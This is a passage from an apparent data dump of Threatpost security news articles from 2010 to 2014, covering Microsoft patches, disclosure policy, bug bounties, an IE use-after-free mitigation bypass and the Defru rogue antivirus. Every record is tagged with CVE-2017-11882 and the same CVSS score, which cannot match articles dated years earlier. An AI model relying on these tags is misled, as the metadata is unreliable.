\u201cdefaultRedirect\u201d attribute on the <customErrors> section and ensure that no per-status codes are set.\u201d\n\nHowever, the researcher who [demonstrated the ASP.NET attack](<https://threatpost.com/microsoft-warns-attacks-against-aspnet-flaw-092110/>) at the Ekoparty conference last week, Juliano Rizzo and Thai Duong, said that the [attack will work even without error messages](<https://twitter.com/thaidn/statuses/24832350146>) from the target application. \n\nMicrosoft security officials said that they plan to release a patch for the ASP.NET flaw, although they have not specified any time frame for the release. \n", "cvss3": {}, "published": "2010-09-21T15:04:11", "type": "threatpost", "title": "Microsoft Warns of Attacks Against ASP.NET Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T12:00:14", "id": "THREATPOST:4D225F38F43559CB340E0C0C20E1C9BD", "href": "https://threatpost.com/microsoft-warns-attacks-against-aspnet-flaw-092110/74498/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:16", "description": "Microsoft\u2019s security response team is investigating the release of a new zero-day flaw that exposes Windows 7 users to blue-screen crashes or code execution attacks.\n\nThe flaw could be exploited by local attackers to cause a denial-of-service or potentially gain elevated privileges, according to an advisory from VUPEN, a French security research outfit.\n\nFrom VUPEN\u2019s advisory:\n\n_This issue is caused by a buffer overflow error in the \u201cCreateDIBPalette()\u201d function within the kernel-mode device driver \u201cWin32k.sys\u201d when using the \u201cbiClrUsed\u201d member value of a \u201cBITMAPINFOHEADER\u201d structure as a counter while retrieving Bitmap data from the clipboard, which could be exploited by malicious users to crash an affected system or potentially execute arbitrary code with kernel privileges._\n\nThe flaw is confirmed on fully patched Microsoft Windows 7, Windows Server 2008 SP2, Windows Server 2003 SP2, Windows Vista SP2, and Microsoft Windows XP SP3.\n\nMicrosoft plans to issue 13 bulletins with patches for 34 vulnerabilities tomorrow (Tuesday August 10) but it is unlikely we will see a fix for this new issue.\n", "cvss3": {}, "published": "2010-08-09T13:39:48", "type": "threatpost", "title": "Another Windows 7 Zero-Day Released", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:36:22", "id": "THREATPOST:1071D90B9DDF02B6FC796EE160E0AFDD", "href": "https://threatpost.com/another-windows-7-zero-day-released-080910/74306/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:21", "description": "Microsoft has no plans to follow in the footsteps of Mozilla and Google and pay researchers cash rewards for the bugs that they find in Microsoft\u2019s products.\n\nIn the wake of both Mozilla and Google significantly increasing their bug bounties to the $3,000 range, there have been persistent rumors in the security community that Microsoft soon would follow suit and start paying bounties as well. However, a company official said on Thursday that Microsoft was not interested in paying bounties.\n\n\u201cWe value the researcher ecosystem, and show that in a variety of ways, but we don\u2019t think paying a per-vuln bounty is the best way. Especially when across the researcher community the motivations aren\u2019t always financial. It is well-known that we acknowledge researcher\u2019s contributions in our bulletins when a researcher has coordinated the release of vulnerability details with the release of a security update,\u201d Microsoft\u2019s Jerry Bryant said in an email. \u201cWhile we do not provide a monetary reward on a per-bug basis, like any other industry, we do recognize and honor talent. We\u2019ve had several influential folks from the researcher community join our security teams as Microsoft employees. We\u2019ve also entered into contracts directly with many vendors and sometimes individual researchers to test our products for vulnerabilities before they\u2019re released. Many of these vendors and individuals first came to our attention based on the high-quality and unique approaches demonstrated by the vulnerabilities they reported to the MSRC.\u201d\n\nSome researchers have been calling on large software vendors such as Microsoft, Adobe, Apple and others to pay for the bugs that outsiders find in their products, but so far none of these companies has shown any indication that they\u2019re willing to do so. Third-party vulnerability buyers such as TippingPoint\u2019s Zero Day Initiative and iDefense Labs pay varying amounts for vulnerabilities, depending upon the severity of the bug. And there is also an unknown number of bugs sold to government agencies, defense contractors and other buyers in private sales every year.\n\nMozilla last week said it was [raising its bug bounty to $3,000](<https://threatpost.com/mozilla-bumps-bug-bounty-3000-071610/>), and Google made a similar move four days later,[ jacking its top price up to $3,133.7](<https://threatpost.com/google-ups-bug-bounty-ante-313370-072010/>).\n\n[block:block=47]\n\nMicrosoft has been using outside researchers to test their software for security flaws on a contract and one-off basis for years now. But much of that work goes to boutique consultancies and not to individual researchers who find the bugs on their own time. That\u2019s one of the reasons that [some researchers have been encouraging their peers to stop reporting vulnerabilities](<https://threatpost.com/no-more-free-bugs-software-vendors-032309/>) to vendors who don\u2019t pay bug bounties. The reasoning being that the vendors have their own in-house testers and consultants, who are getting paid, so there\u2019s nothing in it for outside researchers, aside from an acknowledgement from the vendor.\n", "cvss3": {}, "published": "2010-07-22T20:54:11", "type": "threatpost", "title": "Microsoft Says No to Paying Bug Bounties", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:36:29", "id": "THREATPOST:632A7F4B404E8A9E7D49A4895D573FDB", "href": "https://threatpost.com/microsoft-says-no-paying-bug-bounties-072210/74249/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:22", "description": "[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07055802/micro_disclosure.jpg)](<https://threatpost.com/microsoft-shifts-coordinated-vulnerability-disclosure-policy-072210/>)Microsoft is changing the way in which it handles vulnerability disclosures, now moving to a model it calls coordinated vulnerability disclosure, in which the researcher and the vendor work together to verify a vulnerability and allow ample time for a patch. However, the new philosophy also recognizes that if there are attacks already happening, it may be necessary to release details of the flaw even before a patch is ready.\n\nThe shift is a subtle one from Microsoft, which has always been at the heart of the debate over full disclosure of security vulnerabilities. The company has been very vocal in the past about its assertion that all vulnerabilities in its products should be reported privately to the company and the researcher should then give Microsoft some undisclosed amount of time to come up with a fix. The new CVD strategy still doesn\u2019t lay out a timeline for patch releases, but it represents a public change in the way the company is thinking.\n\nThe new CVD strategy relies on researchers to report vulnerabilities either directly to a vendor or to a trusted third party, such as a CERT-CC, who will then report it to the vendor. The finder and the vendor would then try to agree on a disclosure timeline and work from there. \n\n\u201d Newly discovered vulnerabilities in hardware, software, and services \nare disclosed directly to the vendors of the affected product, to a \nCERT-CC or other coordinator who will report to the vendor privately, or \nto a private service that will likewise report to the vendor privately. \nThe finder allows the vendor an opportunity to diagnose and offer fully \ntested updates, workarounds, or other corrective measures before \ndetailed vulnerability or exploit information is shared publicly. If \nattacks are underway in the wild, earlier public vulnerability details \ndisclosure can occur with both the finder and vendor working together as \nclosely as possible to provide consistent messaging and guidance to \ncustomers to protect themselves,\u201d said Matt Thomlinson, general manager of Microsoft\u2019s Trustworthy Computing group. \n\n\u201cCVD does not represent a huge departure from the current definition \nof \u201cresponsible disclosure,\u201d and we would still view vulnerability \ndetails being released broadly outside these guidelines as putting \ncustomers at unnecessary levels of risk. However, CVD does allow for \nmore focused coordination on how issues are addressed publicly. CVD\u2019s \ncore principles are simple: vendors and finders need to work closely \ntoward a resolution; extensive efforts should be made to make a timely \nresponse; and only in the event of active attacks is public disclosure, \nfocused on mitigations and workarounds, likely the best course of action \n\u2014 and even then it should be coordinated as closely as possible.\u201d\n\nThe change from Microsoft comes close on the heels of several other major shifts in the landscape recently, including the decisions by both Google and Mozilla to raise their bounties for security bugs to $3,133.7 and $3,000, respectively. Microsoft has steadfastly refused to pay bug bounties in the past, though there are persistent rumors that the company may do so at some point in the near future. \n\nThe CVD plan closely resembles other disclosure strategies that have been released over the years, and incorporates some elements of plans that researchers have suggested. The use of trusted third parties, such as the CERT-CC, is something that has been suggested by a number of people in the past, and has the advantage of including a dispassionate organization that can work with both the researcher and the vendor when conflicts arise or if the vendor is unresponsive. \n\nThe new CVD policy, in fact, incorporates some of the elements that were laid out in a [plan written by the defunct Organization for Internet Safey in 2004](<http://www.symantec.com/security/OIS_Guidelines%20for%20responsible%20disclosure.pdf>), particularly the usage of third parties to help moderate the process.\n\nThe key concession in the new CVD strategy is the acknowledgement that there are times when it may be necessary for the researcher to disclose details of a given vulnerability before a patch is ready. This often is done if a vendor is not responsive to the researcher or if the researcher doesn\u2019t think the vendor is making a good faith effort to fix a flaw quickly enough. However, as Microsoft says in its policy, disclosure of flaw details may be necessary in cases where attacks against the vulnerability are already underway in the wild and security staffs need information on the problem to help protect their networks. \n\nKatie Moussouris, a senior security strategist at Microsoft, said in a [related blog post](<http://blogs.technet.com/b/ecostrat/archive/2010/07/22/coordinated-vulnerability-disclosure-bringing-balance-to-the-force.aspx>) that the company needs help from the research community to make this CVD philosophy work.\n\n[block:block=47]\n\n\u201cResponsible Disclosure should be deprecated in favor of something \nfocused on getting the job done, which is to improve security and to \nprotect users and systems. As such, Microsoft is asking researchers to \nwork with us under Coordinated Vulnerability Disclosure, and added some \ncoordinated public disclosure possibilities before a vendor-supplied \npatch is available when active attacks are underway. It uses the trigger \nof attacks in the wild to switch modes, which is an event that is \nobjectively observable by many independent sources,\u201d she wrote. \u201cMake no mistake about it, CVD is basically founded on the initial \npremise of Responsible Disclosure, but with a coordinated public \ndisclosure strategy if attacks begin in the wild. That said, what\u2019s \ncritical in the reframing is the heightened role coordination and shared \nresponsibility play in the nature and accepted practice of \nvulnerability disclosure. This is imperative to understand amidst a \nchanging threat landscape, where we all accept that no longer can one \nindividual, company or technology solve the online crime challenge.\u201d \n", "cvss3": {}, "published": "2010-07-22T16:50:37", "type": "threatpost", "title": "Microsoft Shifts to 'Coordinated Vulnerability Disclosure' Policy", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T12:21:38", "id": "THREATPOST:E539817E8025A93279C63158F37F2DFB", "href": "https://threatpost.com/microsoft-shifts-coordinated-vulnerability-disclosure-policy-072210/74247/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:39", "description": "[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07055611/windows_patch_61.jpg)](<https://threatpost.com/patch-tuesday-microsoft-kills-pwn2own-browser-bug-060810/>)The Microsoft Patch Tuesday train rolled into town today, dropping off a massive 10 security bulletins with fixes for at least 34 documented vulnerabilities. \n\nThree of the bulletins are rated \u201ccritical\u201d because of the risk of remote code execution attacks. Affected products include the Windows operating system, Microsoft Office, the Internet Explorer browser and Internet Information Services (IIS).\n\nThis month\u2019s patch batch also provides cover for a known cross-site scripting flaw in the Microsoft SharePoint Server and a publicly discussed data leakage hole in Internet Explorer.\n\nMicrosoft is urging its users to pay special attention to [MS10-033](<http://www.microsoft.com/technet/security/Bulletin/MS10-033.mspx>) (Windows), [MS10-034](<http://www.microsoft.com/technet/security/Bulletin/MS10-034.mspx>) (ActiveX killbits) and [MS10-035](<http://www.microsoft.com/technet/security/Bulletin/MS10-035.mspx>) (Internet Explorer) because these contain fixes for issues that may be exploited by malicious hackers very soon.\n\nHere\u2019s the skinny on these three bulletins:\n\n * [MS10-033](<http://www.microsoft.com/technet/security/Bulletin/MS10-033.mspx>) \u2014 This security update resolves two privately reported vulnerabilities \nin Microsoft Windows. These vulnerabilities could allow remote code \nexecution if a user opens a specially crafted media file or receives \nspecially crafted streaming content from a Web site or any application \nthat delivers Web content. This is rated Critical for Quartz.dll \n(DirectShow) on Microsoft Windows 2000, Windows XP, Windows Server 2003, \nWindows Vista, and Windows Server 2008; Critical for Windows Media \nFormat Runtime on Microsoft Windows 2000, Windows XP, and Windows Server \n2003; Critical for Asycfilt.dll (COM component) on Microsoft Windows \n2000, Windows XP, Windows Server 2003, Windows Vista, Windows Server \n2008, Windows 7, and Windows Server 2008 R2; and Important for Windows \nMedia Encoder 9 x86 and x64 on Microsoft Windows 2000, Windows XP, \nWindows Server 2003, Windows Vista, and Windows Server 2008.\n * [MS10-034](<http://www.microsoft.com/technet/security/Bulletin/MS10-034.mspx>) \u2014 This security update addresses two privately reported vulnerabilities \nfor Microsoft software. This security update is rated Critical for all \nsupported editions of Microsoft Windows 2000, Windows XP, Windows Vista, \nand Windows 7, and Moderate for all supported editions of Windows \nServer 2003, Windows Server2008, and Windows Server 2008 R2. The vulnerabilities could allow remote code \nexecution if a user views a specially crafted Web page that instantiates \na specific ActiveX control with Internet Explorer. It also includes kill bits for four third-party ActiveX controls.\n * [MS10-035](<http://www.microsoft.com/technet/security/Bulletin/MS10-035.mspx>) \u2014 Fixes five privately reported vulnerabilities and one publicly \ndisclosed vulnerability in Internet Explorer. The most severe \nvulnerabilities could allow remote code execution if a user views a \nspecially crafted Web page using Internet Explorer. Users whose accounts \nare configured to have fewer user rights on the system could be less \nimpacted than users who operate with administrative user rights.This \nsecurity update is rated Critical for Internet Explorer 6 Service Pack 1 \non Microsoft Windows 2000 Service Pack 4; Critical for Internet \nExplorer 6, Internet Explorer 7, and Internet Explorer 8 on Windows \nclients; and Moderate for Internet Explorer 6, Internet Explorer 7, and \nInternet Explorer 8 on Windows servers.\n\nQualys CTO Wolfgang Kandek noticed that four of the 10 bulletins address zero-day issues, the most significant being MS10-035, which fixes the zero-day published by Core Security for an information disclosure vulnerability originally published in February 2010. It also fixes the PWN2OWN vulnerability that security researcher Peter Vreugdenhil used to win ZDI\u2019S competition at CANSECWEST. During that contest, Vreugdenhil bypassed all built-in protections such as DEP and ASLR by combining multiple attack methods. \n \nThe MS10-040 bulletin is also interesting. It covers a a remotely exploitable vulnerability in all versions of IIS, but it is present only if the administrator has downloaded and installed the Channel Binding Update and enabled Windows Authentication. It further requires an account on the system, reducing the number of vulnerable hosts to a small subset. Microsoft rates this an \u201cimportant\u201d update.\n", "cvss3": {}, "published": "2010-06-08T19:07:32", "type": "threatpost", "title": "Patch Tuesday: Microsoft Kills Pwn2Own Browser Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T12:36:58", "id": "THREATPOST:3BDDDA913AECAA168F2B8059EF6BF25A", "href": "https://threatpost.com/patch-tuesday-microsoft-kills-pwn2own-browser-bug-060810/74077/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:47", "description": "[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07055513/microsoft_govt.jpg)](<https://threatpost.com/microsoft-share-vulnerability-details-governments-051810/>)Microsoft today announced plans to share pre-patch details on software vulnerabilities with governments around the world under a new program aimed at securing critical infrastructure and government assets from hacker attacks.\n\nThe program, codenamed Omega, features a Defensive Information Sharing Program (DISP) will offer governments entities at the national level with technical information on vulnerabilities that are being updated in our products.\n\nMicrosoft\u2019s Steve Adegbite [explains](<http://blogs.technet.com/ecostrat/archive/2010/05/17/strengthening-the-security-cooperation-program.aspx>):\n\n_We will provide this information after our investigative and remediation cycle is completed to ensure that DISP members are receiving the most current information. While this process varies from issue to issue due to the complex nature of vulnerabilities, disclosure will happen just prior to our security update release cycles._\n\nThe company also announced a second information sharing program called the Critical Infrastructure Partner Program (CIPP) that aims to \u201cprovide valuable insights on security policy, including strategies, approaches to help aid the protection efforts for critical infrastructures,\u201d according to Adegbite.\n", "cvss3": {}, "published": "2010-05-18T19:01:18", "type": "threatpost", "title": "Microsoft to Share Vulnerability Details with Governments", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T12:45:12", "id": "THREATPOST:738BF7215D8F472D205FCBD28D6068E5", "href": "https://threatpost.com/microsoft-share-vulnerability-details-governments-051810/73986/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:31", "description": "For a long time, Microsoft\u2019s monthly Patch Tuesday security bulletins have periodically addressed use-after free vulnerabilities, the latest class of memory corruption bugs that have already found their way into a number of targeted attacks.\n\nMicrosoft has implemented mitigations to address memory related vulnerabilities that afford successful attackers control over the underlying computer. Most notably, Microsoft has stood behind its Enhanced Mitigation Experience Toolkit, or EMET, suggesting it on several occasions as a temporary mitigation for a vulnerability until the company could push out a patch to users.\n\nMost recently, Microsoft brought new memory defenses to the browser, loading Internet Explorer with two new protections called Heap Isolation and Delayed Free, both of which take steps inside IE to frustrate and deny the execution of malicious code.\n\nResearchers have had a growing interest in [bypassing EMET and memory protections](<http://threatpost.com/microsoft-emet-bypasses-realm-of-white-hats-for-now/104619>) for some time, with some [successful bypasses](<http://threatpost.com/researchers-develop-complete-microsoft-emet-bypass/104437>) disclosed and ultimately addressed by Microsoft. And until the [Operation Snowman attacks](<http://threatpost.com/new-ie-10-zero-day-targeting-military-intelligence/104272>), they were exclusively the realm of white hats\u2014as far as we know publicly.\n\nAs with the [EMET protections](<http://threatpost.com/pwn2own-paying-150000-grand-prize-for-microsoft-emet-bypass/104015>), Heap Isolation and Delay Free were bound to attract some attention and last week at ShmooCon, a hacker conference in Washington, D.C., Bromium Labs principal security researcher Jared DeMott successfully demonstrated a bypass for both.\n\nDeMott\u2019s bypass relies on what he termed a weakness in Microsoft\u2019s approach with the new protections. With Heap Isolation, a new heap is created housing sensitive internal IE objects, while objects such as JavaScript likely to be targeted remain in the default heap, he said.\n\n> DeMott\u2019s bypass works through the use of what he calls a \u201clong-lived dangling pointer.\u201d\n> \n> [Tweet](<https://twitter.com/share?url=https%3A%2F%2Fthreatpost.com%2Fbypass-demonstrated-for-microsoft-use-after-free-mitigation-in-ie%2F110570%2F&text=DeMott%26%238217%3Bs+bypass+works+through+the+use+of+what+he+calls+a+%26%238220%3Blong-lived+dangling+pointer.%26%238221%3B>)\n\n\u201cThus if a UaF condition appears, the attacker should not be able to replace the memory of the dangling pointer with malicious data,\u201d he wrote in a [report](<http://labs.bromium.com/2015/01/17/use-after-free-new-protections-and-how-to-defeat-them/>) published this week. This separation of good and bad data, however, isn\u2019t realistic given the complexity of code and objects. Delayed Free then kicks in by delaying the release of an object to memory until there are no references to the object on the stack and 100,000 bytes are waiting to be freed, DeMott said.\n\nTaking advantage of these conditions, DeMott\u2019s bypass works through the use of what he calls a \u201clong-lived dangling pointer.\u201d\n\n\u201cIf an attacker can locate a UaF bug that involves code that maintains a heap reference to a dangling pointer, the conditions to actually free the object under the deferred free protection can be met (no stack references or call chain eventually unwinds),\u201d DeMott said. \u201cAnd finding useful objects in either playground to replace the original turns out not to be that difficult either.\u201d\n\n[DeMott\u2019s bypass is a Python script](<https://bromiumlabs.files.wordpress.com/2015/01/allocationinformation-py.zip>) which searches IE for all objects, sizes and whether an object is allocated to the default or isolated heap.\n\n\u201cThis information can be used to help locate useful objects to attack either heap,\u201d he wrote. \u201cAnd with a memory garbage collection process known as coalescing the replacement object does not even have to be the same size as the original object.\u201d\n\nDeMott said an attack would be similar to other client-side attacks. A victim would have to be lured to a website via phishing or a watering hole attack and be infected with the exploit.\n\n\u201cIf you have a working UaF bug, you have to make sure it\u2019s of this long-live type and can basically upgrade it to an existing attack to bypasses these mitigations,\u201d DeMott told Threatpost. \u201cThere\u2019s no secret sauce, like every attack, it just depends on a good bug.\u201d\n\nDeMott said he expects use-after-free to be the next iteration of memory corruption attacks.\n\n\u201cThere\u2019s always a need [for attackers] to innovate,\u201d DeMott said, pointing out that Microsoft deployed ASLR and DEP in response to years of buffer overflow and heap spray attacks, only to be thwarted by attackers with use-after-free vulnerabilities. \u201cIt\u2019s starting to happen, it\u2019s coming if it\u2019s not already here.\u201d\n", "cvss3": {}, "published": "2015-01-21T11:40:11", "type": "threatpost", "title": "Bypass Demonstrated for Microsoft Use-After-Free Mitigation in IE", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-01-21T16:40:11", "id": "THREATPOST:14FF20625850B129B7F957E8393339F1", "href": "https://threatpost.com/bypass-demonstrated-for-microsoft-use-after-free-mitigation-in-ie/110570/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:45", "description": "Microsoft made patch news on two fronts last month with an unusual [emergency patch for a critical vulnerability in Kerberos](<http://threatpost.com/microsoft-to-release-critical-out-of-band-windows-patch/109433>), and for a missing fix for an Exchange bug that was promised in its November advanced notification.\n\nIn the [December advance notification](<https://technet.microsoft.com/library/security/ms14-dec>), released today, an elevation privilege bug in Exchange is listed among seven scheduled bulletins to be pushed out next Tuesday. The Exchange patch is rated important, one of four bulletins so rated by Microsoft; the remaining three are rated critical, meaning the likelihood of remote code execution and imminent exploit is high.\n\nExpect the Exchange patch to be MS14-075. The patch applies to Microsoft Exchange Server 2007 SP3, Exchange Server 2010 SP3, Exchange Server 2013 SP1 and Exchange Server 2013 Cumulative Update 6. No further details were made available by Microsoft.\n\nThe three critical bulletins expected next week are topped off by another Internet Explorer rollup. The IE vulnerabilities addressed are rated moderate for IE 6, IE 7 and IE 8 running on Windows Server 2003 and Windows Server 2008. They are rated critical for remote code execution on Vista, Windows 7, Windows 8 and 8.1 for IE 7 and up.\n\nAnother critical remote code execution bulletin is expected in Office software starting with Microsoft Word 2007 SP 3, as well as Microsoft Office 2010 SP 2, Word 2010 SP 2, Word 2013 and Word 2013 RT. Microsoft Office for Mac 2011 is also vulnerable, as is Microsoft Word Viewer and Microsoft Office Compatibility Pack. Microsoft SharePoint Server 2010, 2013, and Microsoft Office Web apps 2010 and 2013 are also covered by this bulletin, but those vulnerabilities are rated important.\n\nTwo other bulletins patch remote code execution vulnerabilities in Office, but are rated important, meaning there is some mitigating circumstance, for example, an attacker would need local access or legitimate credentials exploit the flaw.\n\n\u201cWith the balance of next week\u2019s bulletins impacting Windows, December will be a month for IT to focus on the desktop,\u201d said Russ Ernst of Lumension.\n\nThe final critical bulletin covers remote code execution vulnerabilities in Windows Vista. The flaw is rated important for all other Windows Server versions. Windows Server 2003 users, meanwhile, are on notice that support runs out for the platform July 14, 2015.\n\nAs the year winds down, the number of critical bulletins is down. Microsoft is on track for 29 critical bulletins this year, compared to 42 last year, and 35 the year before. IT shops will have 83 bulletins to contend with this year, down from 105 in 2013, Lumension said.\n", "cvss3": {}, "published": "2014-12-04T14:04:03", "type": "threatpost", "title": "December 2014 Microsoft Patch Tuesday Advance Notification", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-12-09T21:46:18", "id": "THREATPOST:FFB8302BEBD76DDACC5FD08D3FF8F883", "href": "https://threatpost.com/missing-exchange-patch-expected-among-december-patch-tuesday-bulletins/109722/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:17", "description": "Rogue antivirus was once the scourge of the Internet, and [while this sort of malware is not entirely extinct](<http://threatpost.com/pro-syrian-malware-increasing-in-number-complexity/107814>), it\u2019s fallen out of favor among criminals as users have become more aware and security products have gotten better at blocking the threat.\n\n[![Image via TechNet](https://media.threatpost.com/wp-content/uploads/sites/103/2014/08/07015231/Rogue-AV-decline-300x152.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2014/08/07015231/Rogue-AV-decline.png>)\n\n_Image via TechNet_\n\nHowever, Daniel Chipiristeanu, an antivirus researcher at the Microsoft Malware Protection Center (MMPC), claims that a simpler, and primarily browser-based, version of the fake antivirus scheme has proven more effective in recent months.\n\nThe MMPC says that once a user machine is compromised by once such piece of malware, Rogue:Win32/Defru, it blocks users from browsing to a long list of popular websites on the Internet and instead presents an image familiar to anyone who\u2019s dealt with rogue antivirus in the past.\n\n\u201cWhen the user is browsing the Internet, the rogue will use the hosts file to redirect links to a rather infamous specific fake website (pcdefender.<removed> IP 82.146.<removed>.21) that is often used in social engineering by fake antivirus malware,\u201d Chipiristeanu explained on Microsoft\u2019s TechNet blog.\n\n[![Image via TechNet](https://media.threatpost.com/wp-content/uploads/sites/103/2014/08/07015227/win32delfru-269x300.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2014/08/07015227/win32delfru.png>)\n\n_Image via TechNet_\n\nWhile the user will see the above image in their browser window, the URL in the address bar will be that of the website the user intended to visit in the first place. In other words, the malware quietly redirects the user to a new website, but the address bar does not reflect that movement. If the user tries to access another website, the threat follows. The message reads:\n\n\u201c_Detected on your computer malicious software that blocks access to certain Internet resources, in order to protect your authentication data from intruders the defender system Windows Security was forced to intervene.\u201d_\n\nThe fake scanner shows users a long list of non-existent malware it claims to have found on the computer in question. Then it offers to clean the system for a fee. If the user clicks the \u201cPay Now\u201d button, he will be redirected to a payment portal called \u201cpayeer.\u201d\n\n[![Image via TechNet](https://media.threatpost.com/wp-content/uploads/sites/103/2014/08/07015224/defru-payment-300x143.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2014/08/07015224/defru-payment.png>)\n\n_Image via TechNet_\n\nChipiristeanu claims that paying the fee will not fix the problem.\n\nAt the moment, most of Defru\u2019s victim-machines \u2013 as is indicated by language \u2013 appear to be located in Russia. The United States is a distant second to Russia with Kazakhstan following closely behind in third. The remaining infections are mostly in eastern European and Middle Eastern states with some infections in western Europe as well.\n\nYou can find the list of redirected sites with the [detailed Defru malware information](<http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Rogue:Win32/Defru#tab=2>).\n\n\u201cThe rogue is written in PHP, uses a PHP EXE compiler (Bambalam) and will copy itself to %appdata%\\w1ndows_<4chars>.exe (e.g. \u2018w1ndows_33a0.exe\u2019),\u201d Chipiristeanu explains. \u201cIt persists at system reboot by adding itself to the registry key HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run with the value \u2018w1ndows_<4chars>\u2019.\u201d\n\n\u201cThe user can clean their system by removing the entry value from the \u201crun\u201d registry key, delete the file from disk and delete the added entries from the hosts file.\u201d\n", "cvss3": {}, "published": "2014-08-20T13:59:20", "type": "threatpost", "title": "Fake AV Defru Puts New Spin on Rogue AV", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-08-25T18:42:59", "id": "THREATPOST:4FA617D4BE1CFDFB912E254229B94E61", "href": "https://threatpost.com/a-new-spin-on-rogue-antivirus/107846/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:20", "description": "Microsoft today released its monthly [Patch Tuesday Security Bulletins](<https://technet.microsoft.com/library/security/ms14-aug>), and the top priority is another cumulative update for Internet Explorer; this one patches 26 vulnerabilities, including one that\u2019s been publicly reported, Microsoft said, and is likely being exploited. All of them are rated critical by Microsoft and allow for remote code execution should a user land on a malicious webpage using IE.\n\n\u201cIf you feel like you are constantly patching IE \u2013 you are,\u201d said Russ Ernst of Lumension. \u201cA cumulative update for the browser is now the rule more so than the exception.\u201d\n\nErnst\u2019s sentiments are no doubt being echoed in enterprise IT shops worldwide. Admins have to contend with a number of upcoming changes related to IE as well. Microsoft last week put the word out that users had [18 months to migrate to the latest version of Internet Explorer](<http://blogs.msdn.com/b/ie/archive/2014/08/07/stay-up-to-date-with-internet-explorer.aspx>) for their respective versions of Windows before support would end. That would mean no more security updates for IE 6-8, older versions of the browser that lack built-in memory protections, making it so attractive for hackers and exploits.\n\nThe company followed that up last week with news that it would begin [blocking older ActiveX controls in IE](<http://threatpost.com/microsoft-expected-to-patch-ie-8-zero-day-on-patch-tuesday/106491>), starting with outdated versions of Java. That begins today, Microsoft said.\n\nThe point is that Microsoft is tired of IE being a punching bag, and it\u2019s going to force users\u2019 hands to upgrade to more secure versions of the browser and lessen the impact of targeted attacks and potential problems with [zero-days](<http://threatpost.com/microsoft-expected-to-patch-ie-8-zero-day-on-patch-tuesday/106491>) such as the one reported by HP\u2019s Zero Day Initiative in May.\n\n\u201cOutdated browsers represent a major challenge in keeping the Web ecosystem safer and more secure, as modern Web browsers have better security protection. Internet Explorer 11 includes features like Enhanced Protected Mode to help keep customers safer,\u201d said Roger Capriotti, director Internet Explorer, in a [blog post](<http://blogs.msdn.com/b/ie/archive/2014/08/07/stay-up-to-date-with-internet-explorer.aspx>) last week.\n\nToday\u2019s IE update, [MS14-051](<https://technet.microsoft.com/library/security/MS14-051>), include a slew of memory corruption bugs, most of them use-after-free vulnerabilities that are quickly catching up to buffer overflows as a favorite exploit for attackers.\n\n\u201cRecent advances in the state of the art for DOM fuzzing have made it easier to find [use-after-free] bugs in web browsers as researchers have found it harder and harder to find and exploit more traditional buffer overflows,\u201d said Craig Young, security researcher at Tripwire.\n\nYoung said hackers can combine a use-after-free vulnerability with a number of other techniques to bypass memory protections built in to the browser.\n\n\u201cJavaScript engines running in all browsers make it much easier for attackers to control memory allocators and therefore gain reliable code execution,\u201d Young said. \u201cCombining this vulnerability with JavaScript based \u2018heap-spraying\u2019 attacks and DEP-bypass techniques provides attackers with an easy way to execute arbitrary code.\u201d\n\nMicrosoft also advises that users pay attention to out-of-band updates released today by Adobe that patch vulnerabilities in Flash Player, as well as [a zero-day being exploited in targeted attacks against Adobe Reader and Acrobat](<http://threatpost.com/adobe-patches-reader-zero-day-used-in-targeted-attacks/107721>).\n\nThe remaining critical bulletin released today by Microsoft addresses a remote code execution vulnerability in Windows Media Center. [MS14-043](<https://technet.microsoft.com/library/security/ms14-043>) would require a user open a malicious Microsoft Office file that invokes a resource in the Media Center. This bulletin affects only Windows 7, 8 and 8.1 versions of Windows Media Center, as well as users of Windows Media Center TV Pack for Vista.\n\nThe final remote code execution vulnerability patched 